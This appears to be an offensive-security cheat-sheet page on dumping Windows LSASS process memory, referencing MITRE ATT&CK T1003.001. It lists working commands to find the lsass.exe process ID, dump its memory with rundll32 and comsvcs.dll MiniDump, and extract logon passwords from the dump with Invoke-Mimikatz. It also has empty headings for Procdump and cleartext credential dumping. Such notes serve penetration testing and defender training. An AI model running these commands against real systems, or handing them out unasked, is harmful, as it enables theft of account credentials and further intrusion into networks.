LSASS Memory
https://attack.mitre.org/techniques/T1003/001/
Techniques
comsvcs.dll
# Get lsass.exe PID
tasklist /fi "Imagename eq lsass.exe"
# Call comsvcs.dll and dump to file.
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <PID> \Windows\Temp\lsass_dump.dmp full
# Dump with Mimikatz
Invoke-Mimikatz -Command "sekurlsa::Minidump lsass_dump.dmp"
Invoke-Mimikatz -Command "sekurlsa::logonPasswords /full"Mimikatz

Procdump

Dumping cleartext credentials

Task Manager / RDP

Last updated